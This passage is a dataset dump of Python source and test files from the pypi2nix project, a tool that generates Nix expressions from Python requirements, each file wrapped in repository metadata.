\".join(\n [\n \"with import <nixpkgs> {};\",\n 'stdenv.mkDerivation { name = \"python3-env\"; buildInputs = [python3 python3.pkgs.setuptools]; }',\n ]\n )\n )\n return path\n\n\n@pytest.fixture\ndef python_3_6_environment_nix(tmp_path_factory):\n directory = str(tmp_path_factory.mktemp(\"python_3_6_environment\"))\n path = os.path.join(directory, \"environment.nix\")\n with open(path, \"w\") as f:\n f.write(\n \" \".join(\n [\n \"with import <nixpkgs> {};\",\n 'stdenv.mkDerivation { name = \"python3-env\"; buildInputs = [python36 python36.pkgs.setuptools]; }',\n ]\n )\n )\n return path\n\n\nMarkerDefinition = namedtuple(\"NamedTuple\", [\"name\", \"value\"])\n\n\n@pytest.fixture(\n params=(\n MarkerDefinition(\"os_name\", os.name),\n MarkerDefinition(\"sys_platform\", sys.platform),\n MarkerDefinition(\"platform_machine\", platform.machine()),\n MarkerDefinition(\n \"platform_python_implementation\", platform.python_implementation()\n ),\n MarkerDefinition(\"platform_release\", platform.release()),\n MarkerDefinition(\"platform_system\", platform.system()),\n MarkerDefinition(\"platform_version\", platform.version()),\n MarkerDefinition(\n \"python_version\", \".\".join(platform.python_version_tuple()[:2])\n ),\n MarkerDefinition(\"python_full_version\", platform.python_version()),\n MarkerDefinition(\"implementation_name\", sys.implementation.name),\n MarkerDefinition(\n \"implementation_version\",\n format_full_version(sys.implementation.version)\n if hasattr(sys, \"implementation\")\n else \"0\",\n ),\n )\n)\ndef environment_marker_definition(request):\n \"\"\"This fixture has been generate from https://www.python.org/dev/peps/pep-0508/#environment-markers\"\"\"\n return request.param\n\n\n@nix\ndef test_that_target_platform_can_be_constructed_from_python_version(\n platform_generator: PlatformGenerator, nix, python_3_environment_nix\n):\n platform = platform_generator.from_python_version(PythonVersion.python3)\n assert isinstance(platform, TargetPlatform)\n\n python_3_version = nix.shell(\n command='python -c \"from platform import python_version; print(python_version()[:3])\"',\n derivation_path=python_3_environment_nix,\n ).splitlines()[0]\n assert platform.python_version == python_3_version\n\n\n@nix\ndef test_that_current_platform_to_environment_dict_equals_default_environment(\n current_platform: TargetPlatform,\n):\n assert current_platform.environment_dictionary() == default_environment()\n\n\n@nix\ndef test_that_generated_platform_environment_dictionary_respects_python_version(\n platform_generator: PlatformGenerator, python_3_6_environment_nix, nix\n):\n platform = platform_generator.from_python_version(PythonVersion.python36)\n assert isinstance(platform, TargetPlatform)\n output_string = nix.shell(\n command=\" \".join(\n [\n 'python -c \"from setuptools._vendor.packaging.markers import default_environment;',\n \"from json import dumps;\",\n 'print(dumps(default_environment()))\"',\n ]\n ),\n derivation_path=python_3_6_environment_nix,\n )\n output_json = json.loads(output_string)\n assert platform.environment_dictionary() == output_json\n\n\ndef test_that_environment_marker_with_unknown_os_name_do_not_apply_to_current_platform(\n current_platform: TargetPlatform,\n):\n marker = EnvironmentMarker(\"os_name == 'fake_os_in_unittest'\")\n assert not marker.applies_to_platform(current_platform)\n\n\ndef test_that_environment_markers_from_pep_are_correct_for_current_platform(\n environment_marker_definition: MarkerDefinition, current_platform: TargetPlatform\n):\n assert (\n getattr(current_platform, environment_marker_definition.name)\n == environment_marker_definition.value\n )\n" }, { "alpha_fraction": 0.6853448152542114, "alphanum_fraction": 0.7112069129943848, "avg_line_length": 28, "blob_id": "913a81e18c518fabecc8fae0090e729c4de870fd", "content_id": "ff736117ffee138f19f588b3794e56e7f6ae3e9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 232, "license_type": "no_license", "max_line_length": 43, "num_lines": 8, "path": "/integrationtests/test_aiohttp.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass AiohttpTestCase(IntegrationTest):\n name_of_testcase = \"aiohttp\"\n code_for_testing = [\"import aiohttp\"]\n requirements = [\"aiohttp==2.0.6.post1\"]\n python_version = \"python35\"\n" }, { "alpha_fraction": 0.5230024456977844, "alphanum_fraction": 0.5326876640319824, "avg_line_length": 19.649999618530273, "blob_id": "d46e00bb93a2efe453959d53b322f8fa2da8bf8b", "content_id": "59990ec22fdac4ad64fe5ef135cb1ed3bd26aacb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 413, "license_type": "no_license", "max_line_length": 38, "num_lines": 20, "path": "/integrationtests/test_pillow.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass PillowTestCase(IntegrationTest):\n name_of_testcase = \"pillow\"\n code_for_testing = [\"import PIL\"]\n requirements = [\"Pillow==7.1.2\"]\n\n external_dependencies = [\n \"pkgconfig\",\n \"zlib\",\n \"libjpeg\",\n \"openjpeg\",\n \"libtiff\",\n \"freetype\",\n \"lcms2\",\n \"libwebp\",\n \"tcl\",\n \"xorg.libxcb\",\n ]\n" }, { "alpha_fraction": 0.623798668384552, "alphanum_fraction": 0.6249367594718933, "avg_line_length": 37.019229888916016, "blob_id": "a1b037b39c724a577a515aa76d45614eac7e7c2c", "content_id": "67f19ba8ba70d60e074f5743c25faec794f23b6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7908, "license_type": "no_license", "max_line_length": 88, "num_lines": 208, "path": "/src/pypi2nix/requirement_set.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\nimport tempfile\nfrom typing import Callable\nfrom typing import Dict\nfrom typing import Iterable\nfrom typing import Iterator\nfrom typing import Optional\nfrom typing import TypeVar\nfrom typing import Union\n\nfrom packaging.utils import canonicalize_name\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.requirement_parser import ParsingFailed\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirements import Requirement\nfrom pypi2nix.requirements_file import RequirementsFile\nfrom pypi2nix.sources import Sources\nfrom pypi2nix.target_platform import TargetPlatform\n\nT = TypeVar(\"T\")\n\n\nclass RequirementSet:\n def __init__(self, target_platform: TargetPlatform) -> None:\n self.requirements: Dict[str, Requirement] = dict()\n self.constraints: Dict[str, Requirement] = dict()\n self.target_platform = target_platform\n\n def add(self, requirement: Requirement) -> None:\n if requirement.name() in self.requirements:\n self.requirements[requirement.name()] = self.requirements[\n requirement.name()\n ].add(requirement, self.target_platform)\n elif requirement.name() in self.constraints:\n self.requirements[requirement.name()] = self.constraints[requirement.name()]\n del self.constraints[requirement.name()]\n self.add(requirement)\n else:\n self.requirements[requirement.name()] = requirement\n\n def to_file(\n self,\n project_dir: str,\n target_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n logger: Logger,\n ) -> RequirementsFile:\n with tempfile.TemporaryDirectory() as directory:\n requirements_txt = os.path.join(directory, \"requirements.txt\")\n constraints_txt = os.path.join(directory, \"constraints.txt\")\n with open(requirements_txt, \"w\") as f:\n print(self._requirements_file_content(target_platform), file=f)\n print(\"-c \" + constraints_txt, file=f)\n with open(constraints_txt, \"w\") as f:\n print(self._constraints_file_content(target_platform), file=f)\n requirements_file = RequirementsFile(\n requirements_txt, project_dir, requirement_parser, logger=logger\n )\n requirements_file.process()\n return requirements_file\n\n def add_constraint(self, requirement: Requirement) -> None:\n if requirement.name() in self.requirements:\n self.add(requirement)\n elif requirement.name() in self.constraints:\n self.constraints[requirement.name()] = self.constraints[\n requirement.name()\n ].add(requirement, self.target_platform)\n else:\n self.constraints[requirement.name()] = requirement\n\n def filter(\n self, filter_function: Callable[[Requirement], bool]\n ) -> \"RequirementSet\":\n filtered_requirement_set = RequirementSet(self.target_platform)\n filtered_requirement_set.constraints = self.constraints\n for requirement in self:\n if filter_function(requirement):\n filtered_requirement_set.add(requirement)\n return filtered_requirement_set\n\n def to_constraints_only(self) -> \"RequirementSet\":\n new_requirement_set = RequirementSet(self.target_platform)\n for requirement in list(self.requirements.values()) + list(\n self.constraints.values()\n ):\n new_requirement_set.add_constraint(requirement)\n return new_requirement_set\n\n @classmethod\n def from_file(\n constructor,\n requirements_file: RequirementsFile,\n target_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n logger: Logger,\n ) -> \"RequirementSet\":\n file_lines = requirements_file.read().splitlines()\n requirements_set = constructor(target_platform)\n for line in file_lines:\n try:\n requirement = requirement_parser.parse(line)\n except ParsingFailed:\n detected_requirements = constructor._handle_non_requirement_line(\n line, target_platform, requirement_parser, logger\n )\n requirements_set += detected_requirements\n else:\n requirements_set.add(requirement)\n return requirements_set\n\n def sources(self) -> Sources:\n sources = Sources()\n for requirement in self.requirements.values():\n source = requirement.source()\n if source is None:\n continue\n else:\n sources.add(requirement.name(), source)\n return sources\n\n def get(self, key: str, default: Optional[T] = None) -> Union[Requirement, None, T]:\n try:\n return self[key]\n except KeyError:\n return default\n\n def __len__(self) -> int:\n return len(self.requirements)\n\n def __add__(self, other: \"RequirementSet\") -> \"RequirementSet\":\n requirement_set = RequirementSet(self.target_platform)\n\n requirements = list(self.requirements.values()) + list(\n other.requirements.values()\n )\n for requirement in requirements:\n requirement_set.add(requirement)\n\n constraints = list(self.constraints.values()) + list(other.constraints.values())\n for constraint in constraints:\n requirement_set.add_constraint(constraint)\n\n return requirement_set\n\n def __contains__(self, name: str) -> bool:\n return name in self.requirements\n\n def __iter__(self) -> Iterator[Requirement]:\n yield from self.requirements.values()\n\n def __getitem__(self, key: str) -> Requirement:\n return self.requirements[canonicalize_name(key)]\n\n def _requirements_file_content(self, target_platform: TargetPlatform) -> str:\n return self._requirements_to_file_content(\n self.requirements.values(), target_platform\n )\n\n def _constraints_file_content(self, target_platform: TargetPlatform) -> str:\n return self._requirements_to_file_content(\n self.constraints.values(), target_platform\n )\n\n @classmethod\n def _requirements_to_file_content(\n _, requirements: Iterable[Requirement], target_platform: TargetPlatform\n ) -> str:\n return \"\\n\".join(\n [\n requirement.to_line()\n for requirement in requirements\n if requirement.applies_to_target(target_platform)\n ]\n )\n\n @classmethod\n def _handle_non_requirement_line(\n constructor,\n line: str,\n target_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n logger: Logger,\n ) -> \"RequirementSet\":\n line = line.strip()\n if line.startswith(\"-c \"):\n include_path = line[2:].strip()\n with tempfile.TemporaryDirectory() as project_directory:\n requirements_file = RequirementsFile(\n include_path, project_directory, requirement_parser, logger\n )\n requirements_file.process()\n return constructor.from_file(\n requirements_file, target_platform, requirement_parser, logger\n ).to_constraints_only()\n elif line.startswith(\"-r \"):\n include_path = line[2:].strip()\n with tempfile.TemporaryDirectory() as project_directory:\n requirements_file = RequirementsFile(\n include_path, project_directory, requirement_parser, logger\n )\n requirements_file.process()\n return constructor.from_file(\n requirements_file, target_platform, requirement_parser, logger\n )\n else:\n return constructor(target_platform)\n" }, { "alpha_fraction": 0.6351351141929626, "alphanum_fraction": 0.6434511542320251, "avg_line_length": 35.30188751220703, "blob_id": "5ce8f0186cb1c739d284996d50b0993f68db8084", "content_id": "1ec0ca078702c2c29c8692a271b66f794fb472ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1924, "license_type": "no_license", "max_line_length": 84, "num_lines": 53, "path": "/scripts/package_source.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Optional\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.pypi import Pypi\nfrom pypi2nix.utils import prefetch_git\nfrom pypi2nix.wheels import Index\n\n\nclass PackageSource:\n def __init__(self, index: Index, pypi: Pypi, logger: Logger):\n self.index = index\n self.pypi = pypi\n self.logger = logger\n\n def update_package_from_master(self, package_name: str) -> None:\n url = self._get_url_for_package(package_name)\n if url is None:\n self._log_no_update_warning(package_name)\n return\n repo_data = prefetch_git(url)\n self.index[package_name] = Index.GitEntry(\n url=repo_data[\"url\"], rev=repo_data[\"rev\"], sha256=repo_data[\"sha256\"],\n )\n self._log_update_success(package_name)\n\n def update_package_from_pip(self, package_name: str) -> None:\n package = self.pypi.get_package(package_name)\n source_release = self.pypi.get_source_release(\n name=package_name, version=package.version\n )\n if source_release is None:\n self._log_no_update_warning(package_name)\n return\n self.index[package_name] = Index.UrlEntry(\n url=source_release.url, sha256=source_release.sha256_digest\n )\n self._log_update_success(package_name)\n\n def _get_url_for_package(self, package_name: str) -> Optional[str]:\n return SOURCE_BY_PACKAGE_NAME.get(package_name)\n\n def _log_no_update_warning(self, package_name: str) -> None:\n self.logger.warning(f\"Could not update source for package `{package_name}`\")\n\n def _log_update_success(self, package_name: str) -> None:\n self.logger.info(f\"Successfully updated package `{package_name}`\")\n\n\nSOURCE_BY_PACKAGE_NAME = {\n \"pip\": \"https://github.com/pypa/pip.git\",\n \"setuptools\": \"https://github.com/pypa/setuptools.git\",\n \"wheel\": \"https://github.com/pypa/wheel.git\",\n}\n" }, { "alpha_fraction": 0.7296000123023987, "alphanum_fraction": 0.7322666645050049, "avg_line_length": 28.761905670166016, "blob_id": "11530bb54cb9d2ab81c463abe4e6fc0a989d74e5", "content_id": "7c49ac2ed8fd720f6805c2af82c9e6ce61f7e80d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1875, "license_type": "permissive", "max_line_length": 81, "num_lines": 63, "path": "/unittests/pip/test_install.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\n\nfrom pypi2nix.path import Path\nfrom pypi2nix.pip import Pip\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom ..switches import nix\n\n\n@nix\ndef test_install_six_yields_non_empty_freeze_output(\n pip: Pip,\n project_dir: str,\n download_dir: Path,\n current_platform: TargetPlatform,\n requirement_parser,\n):\n lib_dir = Path(os.path.join(project_dir, \"lib\"))\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"six\"))\n pip.download_sources(requirements, download_dir)\n pip.install(\n requirements, source_directories=[download_dir], target_directory=lib_dir\n )\n assert pip.freeze([lib_dir])\n\n\n@nix\ndef test_install_to_target_directory_does_not_install_to_default_directory(\n pip: Pip,\n project_dir: str,\n download_dir: Path,\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n):\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"six\"))\n target_directory = Path(project_dir) / \"target-directory\"\n target_directory.ensure_directory()\n pip.download_sources(requirements, download_dir)\n\n assert not target_directory.list_files()\n\n pip.install(\n requirements,\n source_directories=[download_dir],\n target_directory=target_directory,\n )\n\n assert target_directory.list_files()\n\n\n@nix\ndef test_install_does_not_install_anything_with_empty_requirements(\n pip: Pip, project_dir: str, current_platform: TargetPlatform\n):\n target_directory = Path(project_dir) / \"target_dir\"\n target_directory.ensure_directory()\n pip.install(RequirementSet(current_platform), [], target_directory)\n assert not target_directory.list_files()\n" }, { "alpha_fraction": 0.567345917224884, "alphanum_fraction": 0.5730616450309753, "avg_line_length": 30.685039520263672, "blob_id": "e27aefc16afe64a07d46be3d90049782af67c749", "content_id": "539407487dbba3c46b29e785ae4e05a15de698b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4024, "license_type": "no_license", "max_line_length": 92, "num_lines": 127, "path": "/src/pypi2nix/overrides.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import urllib\nfrom abc import ABCMeta\nfrom abc import abstractmethod\nfrom typing import Dict\nfrom typing import Optional\nfrom typing import no_type_check\nfrom urllib.parse import urldefrag\nfrom urllib.parse import urlparse\n\nimport click\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.logger import StreamLogger\nfrom pypi2nix.network_file import DiskTextFile\nfrom pypi2nix.network_file import GitTextFile\nfrom pypi2nix.network_file import NetworkFile\nfrom pypi2nix.network_file import UrlTextFile\n\nfrom .utils import prefetch_github\n\n\nclass UnsupportedUrlError(Exception):\n pass\n\n\nclass Overrides(metaclass=ABCMeta):\n @abstractmethod\n def nix_expression(self, logger: Logger) -> str:\n pass\n\n\nclass OverridesNetworkFile(Overrides):\n def __init__(self, network_file: NetworkFile) -> None:\n self._network_file = network_file\n\n def nix_expression(self, logger: Logger) -> str:\n return f\"import ({self._network_file.nix_expression()}) {{ inherit pkgs python ; }}\"\n\n\nclass OverridesGithub(Overrides):\n def __init__(\n self, owner: str, repo: str, path: str, rev: Optional[str] = None\n ) -> None:\n self.owner = owner\n self.repo = repo\n self.path = path\n self.rev = rev\n\n def nix_expression(self, logger: Logger) -> str: # noqa: U100\n prefetch_data = prefetch_github(self.owner, self.repo, self.rev)\n template = \" \".join(\n [\n \"let src = pkgs.fetchFromGitHub {{\",\n 'owner = \"{owner}\";',\n 'repo = \"{repo}\";',\n 'rev = \"{rev}\";',\n 'sha256 = \"{sha256}\";',\n \"}} ;\",\n 'in import \"${{src}}/{path}\" {{',\n \"inherit pkgs python;\",\n \"}}\",\n ]\n )\n return template.format(\n owner=self.owner,\n repo=self.repo,\n rev=prefetch_data[\"rev\"],\n sha256=prefetch_data[\"sha256\"],\n path=self.path,\n )\n\n\nclass NetworkFileParameter(click.ParamType):\n name = \"url\"\n\n @no_type_check\n def convert(self, value, param, ctx):\n try:\n return self._url_to_network_file(value)\n except UnsupportedUrlError as e:\n self.fail(str(e), param, ctx)\n\n def _url_to_network_file(self, url_string: str) -> NetworkFile:\n url = urlparse(url_string)\n if url.scheme == \"\":\n return DiskTextFile(url.path)\n elif url.scheme == \"file\":\n return DiskTextFile(url.path)\n elif url.scheme == \"http\" or url.scheme == \"https\":\n return UrlTextFile(url.geturl(), StreamLogger.stdout_logger())\n elif url.scheme.startswith(\"git+\"):\n return self._handle_git_override_url(url, url_string)\n else:\n raise UnsupportedUrlError(\n \"Cannot handle common overrides url %s\" % url_string\n )\n\n def _handle_git_override_url(\n self, url: urllib.parse.ParseResult, url_string: str\n ) -> GitTextFile:\n if not url.fragment:\n raise UnsupportedUrlError(\n (\n \"Cannot handle overrides with no path given, offending url was\"\n \" {url}.\"\n ).format(url=url_string)\n )\n fragments: Dict[str, str] = dict()\n for fragment_item in url.fragment.split(\"&\"):\n try:\n fragment_name, fragment_value = fragment_item.split()\n except ValueError:\n raise UnsupportedUrlError(\n f\"Encountered deformed URL fragment `{fragment_item}` \"\n f\"in url `{url_string}`\"\n )\n else:\n fragments[fragment_name] = fragment_value\n return GitTextFile(\n repository_url=urldefrag(url.geturl()[4:])[0],\n path=fragments[\"path\"],\n revision_name=fragments.get(\"rev\", \"master\"),\n logger=StreamLogger.stdout_logger(),\n )\n\n\nFILE_URL = NetworkFileParameter()\n" }, { "alpha_fraction": 0.5744863152503967, "alphanum_fraction": 0.5783390402793884, "avg_line_length": 34.39393997192383, "blob_id": "1a169c0d1e381f538175b7ed12bcd11f759f3455", "content_id": "bb455ef7c1890d0c3d5648df9708c169085a55f4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4672, "license_type": "no_license", "max_line_length": 88, "num_lines": 132, "path": "/src/pypi2nix/expression_renderer.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport shlex\nimport sys\nfrom typing import Dict\nfrom typing import Iterable\n\nimport jinja2\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.nix_language import escape_string\nfrom pypi2nix.overrides import Overrides\nfrom pypi2nix.python_version import PythonVersion\nfrom pypi2nix.sources import Sources\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.version import pypi2nix_version\nfrom pypi2nix.wheel import Wheel\n\nHERE = os.path.dirname(__file__)\n\n\ndef render_expression(\n packages_metadata: Iterable[Wheel],\n sources: Sources,\n requirements_name: str,\n requirements_frozen: str,\n extra_build_inputs: Iterable[str],\n enable_tests: bool,\n python_version: PythonVersion,\n target_directory: str,\n logger: Logger,\n target_platform: TargetPlatform,\n common_overrides: Iterable[Overrides] = [],\n) -> None:\n \"\"\"Create Nix expressions.\n \"\"\"\n\n default_file = os.path.join(target_directory, f\"{requirements_name}.nix\")\n overrides_file = os.path.join(target_directory, f\"{requirements_name}_override.nix\")\n frozen_file = os.path.join(target_directory, f\"{requirements_name}_frozen.txt\")\n\n metadata_by_name: Dict[str, Wheel] = {x.name: x for x in packages_metadata}\n\n generated_packages_metadata = []\n for item in sorted(packages_metadata, key=lambda x: x.name):\n if item.build_dependencies:\n buildInputs = \"\\n\".join(\n sorted(\n [\n ' self.\"{}\"'.format(dependency.name())\n for dependency in item.build_dependencies(target_platform)\n ]\n )\n )\n buildInputs = \"[\\n\" + buildInputs + \"\\n ]\"\n else:\n buildInputs = \"[ ]\"\n propagatedBuildInputs = \"[ ]\"\n dependencies = item.dependencies(extras=[])\n if dependencies:\n deps = [\n x.name() for x in dependencies if x.name() in metadata_by_name.keys()\n ]\n if deps:\n propagatedBuildInputs = \"[\\n%s\\n ]\" % (\n \"\\n\".join(\n sorted(\n [\n ' self.\"%s\"' % (metadata_by_name[x].name)\n for x in deps\n if x != item.name\n ]\n )\n )\n )\n source = sources[item.name]\n fetch_expression = source.nix_expression()\n package_format = item.package_format\n generated_packages_metadata.append(\n dict(\n name=item.name,\n version=item.version,\n fetch_expression=fetch_expression,\n buildInputs=buildInputs,\n propagatedBuildInputs=propagatedBuildInputs,\n homepage=item.homepage,\n license=item.license,\n description=escape_string(item.description),\n package_format=package_format,\n )\n )\n\n templates = jinja2.Environment(loader=jinja2.FileSystemLoader(HERE + \"/templates\"))\n\n generated_template = templates.get_template(\"generated.nix.j2\")\n generated = \"\\n\\n\".join(\n generated_template.render(**x) for x in generated_packages_metadata\n )\n\n overrides = templates.get_template(\"overrides.nix.j2\").render()\n\n common_overrides_expressions = [\n \" (\" + override.nix_expression(logger) + \")\" for override in common_overrides\n ]\n\n default_template = templates.get_template(\"requirements.nix.j2\")\n overrides_file_nix_path = os.path.join(\".\", os.path.split(overrides_file)[1])\n default = default_template.render(\n version=pypi2nix_version,\n command_arguments=\" \".join(map(shlex.quote, sys.argv[1:])),\n python_version=python_version.derivation_name(),\n extra_build_inputs=(\n extra_build_inputs\n and \"with pkgs; [ %s ]\" % (\" \".join(extra_build_inputs))\n or \"[]\"\n ),\n overrides_file=overrides_file_nix_path,\n enable_tests=str(enable_tests).lower(),\n generated_package_nix=generated,\n common_overrides=\"\\n\".join(common_overrides_expressions),\n python_major_version=python_version.major_version(),\n )\n\n if not os.path.exists(overrides_file):\n with open(overrides_file, \"w+\") as f:\n f.write(overrides.strip())\n logger.info(\"|-> writing %s\" % overrides_file)\n\n with open(default_file, \"w+\") as f:\n f.write(default.strip())\n\n with open(frozen_file, \"w+\") as f:\n f.write(requirements_frozen)\n" }, { "alpha_fraction": 0.6144975423812866, "alphanum_fraction": 0.6161449551582336, "avg_line_length": 30.947368621826172, "blob_id": "55fe615bee407e92ec7a2cb7faa87203e0a624c3", "content_id": "a8ac33db1b83a39d5fae2ab9e08ae25d3360e9c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1214, "license_type": "no_license", "max_line_length": 79, "num_lines": 38, "path": "/src/pypi2nix/archive.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import tarfile\nimport tempfile\nimport zipfile\nfrom contextlib import contextmanager\nfrom typing import Iterator\n\n\nclass UnpackingFailed(Exception):\n pass\n\n\nclass Archive:\n def __init__(self, path: str) -> None:\n self.path = path\n\n @contextmanager\n def extracted_files(self) -> Iterator[str]:\n with tempfile.TemporaryDirectory() as directory:\n self.unpack_archive(directory)\n yield directory\n\n def unpack_archive(self, target_directory: str) -> None:\n if self.path.endswith(\".tar.gz\"):\n with tarfile.open(self.path, \"r:gz\") as tar:\n tar.extractall(path=target_directory)\n elif self.path.endswith(\".zip\") or self.path.endswith(\".whl\"):\n with zipfile.ZipFile(self.path) as archive:\n archive.extractall(path=target_directory)\n elif self.path.endswith(\".tar.bz2\"):\n with tarfile.open(self.path, \"r:bz2\") as tar:\n tar.extractall(path=target_directory)\n else:\n raise UnpackingFailed(\n \"Could not detect archive format for file {}\".format(self.path)\n )\n\n def __str__(self) -> str:\n return f\"Archive<path={self.path}>\"\n" }, { "alpha_fraction": 0.6970587968826294, "alphanum_fraction": 0.7058823704719543, "avg_line_length": 36.77777862548828, "blob_id": "edd6e89217318d9a834f0e15ba222bd3776c5ac7", "content_id": "8fca489f50602b9fed9632e6a0151a8b6766e4ca", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 340, "license_type": "permissive", "max_line_length": 75, "num_lines": 9, "path": "/unittests/test_environment_marker.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import pytest\n\nfrom pypi2nix.environment_marker import EnvironmentMarker\n\n\n@pytest.mark.parametrize(\"operator\", (\"<\", \"<=\", \"==\", \"!=\", \">\", \">=\"))\ndef test_that_version_comparisons_do_not_throw(operator, current_platform):\n marker = EnvironmentMarker(f\"python_version {operator} '1.0'\")\n marker.applies_to_platform(current_platform)\n" }, { "alpha_fraction": 0.7243027687072754, "alphanum_fraction": 0.728286862373352, "avg_line_length": 30.375, "blob_id": "dc03790ec9902045cdcac283a78fa5d0f414e78b", "content_id": "88f4a786bada21b8a90cb6e1e33c034d574dd759", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1255, "license_type": "permissive", "max_line_length": 84, "num_lines": 40, "path": "/unittests/pip/test_wheel.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pypi2nix.path import Path\nfrom pypi2nix.pip import Pip\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom ..switches import nix\n\n\n@nix\ndef test_pip_can_install_wheels_previously_downloaded(\n pip: Pip,\n project_dir: str,\n current_platform: TargetPlatform,\n requirement_parser: RequirementParser,\n download_dir: Path,\n wheels_dir: Path,\n):\n requirements = RequirementSet(current_platform)\n requirements.add(requirement_parser.parse(\"six\"))\n pip.download_sources(requirements, download_dir)\n pip.build_wheels(\n requirements=requirements,\n source_directories=[download_dir],\n target_directory=wheels_dir,\n )\n assert wheels_dir.list_files()\n assert any(map(lambda x: x.endswith(\".whl\"), wheels_dir.list_files()))\n\n\n@nix\ndef test_pip_wheel_does_not_build_wheels_if_requirements_are_empty(\n pip: Pip, wheels_dir: Path, download_dir: Path, current_platform: TargetPlatform\n):\n pip.build_wheels(\n requirements=RequirementSet(current_platform),\n target_directory=wheels_dir,\n source_directories=[download_dir],\n )\n assert not wheels_dir.list_files()\n" }, { "alpha_fraction": 0.5683736801147461, "alphanum_fraction": 0.5790658593177795, "avg_line_length": 21.212499618530273, "blob_id": "5291679f2570bcef303f558b46160d20e09500dd", "content_id": "fe76a94ec4797d6a8066f4608948d24463320c60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1777, "license_type": "no_license", "max_line_length": 84, "num_lines": 80, "path": "/scripts/install_test.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os\nimport os.path\nimport shutil\nimport subprocess\n\nfrom pypi2nix.version import pypi2nix_version\n\n\ndef main():\n set_up_environment()\n create_virtual_env()\n create_sdist()\n install_sdist()\n run_help_command()\n create_virtual_env()\n create_wheel()\n install_wheel()\n run_help_command()\n\n\ndef set_up_environment():\n os.putenv(\"SOURCE_DATE_EPOCH\", \"315532800\")\n os.unsetenv(\"PYTHONPATH\")\n\n\ndef create_sdist():\n shutil.rmtree(os.path.join(\"src\", \"pypi2nix.egg-info\"), ignore_errors=True)\n subprocess.run([\"build/venv/bin/python\", \"setup.py\", \"sdist\"], check=True)\n\n\ndef create_virtual_env():\n os.makedirs(\"build\", exist_ok=True)\n try:\n shutil.rmtree(\"build/venv\")\n except FileNotFoundError:\n pass\n subprocess.run([\"python\", \"-m\", \"venv\", \"build/venv\"], check=True)\n\n\ndef create_wheel():\n shutil.rmtree(os.path.join(\"src\", \"pypi2nix.egg-info\"), ignore_errors=True)\n subprocess.run(\n [\"build/venv/bin/python\", \"-m\", \"pip\", \"install\", \"wheel\"], check=True\n )\n subprocess.run([\"build/venv/bin/python\", \"setup.py\", \"bdist_wheel\"], check=True)\n\n\ndef install_sdist():\n subprocess.run(\n [\n \"build/venv/bin/python\",\n \"-m\",\n \"pip\",\n \"install\",\n f\"dist/pypi2nix-{pypi2nix_version}.tar.gz\",\n ],\n check=True,\n )\n\n\ndef install_wheel():\n subprocess.run(\n [\n \"build/venv/bin/python\",\n \"-m\",\n \"pip\",\n \"install\",\n f\"dist/pypi2nix-{pypi2nix_version}-py3-none-any.whl\",\n ],\n check=True,\n )\n\n\ndef run_help_command():\n subprocess.run([\"build/venv/bin/pypi2nix\", \"--help\"], check=True)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.7006802558898926, "alphanum_fraction": 0.7100340127944946, "avg_line_length": 34.6363639831543, "blob_id": "56dec68ca3f77d2119f37a2fa67048093163d945", "content_id": "b5711984dcebf4a25e3656e6e5e908633caf3e10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1176, "license_type": "no_license", "max_line_length": 86, "num_lines": 33, "path": "/integrationtests/test_dependency_graph.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pypi2nix.dependency_graph import DependencyGraph\nfrom pypi2nix.requirement_parser import RequirementParser\n\nfrom .framework import IntegrationTest\n\n\nclass DependencyGraphOutputTestCase(IntegrationTest):\n name_of_testcase = \"dependency_graph\"\n requirements = [\"django == 3.0.5\"]\n\n def check_dependency_graph(\n self, dependency_graph: DependencyGraph, requirement_parser: 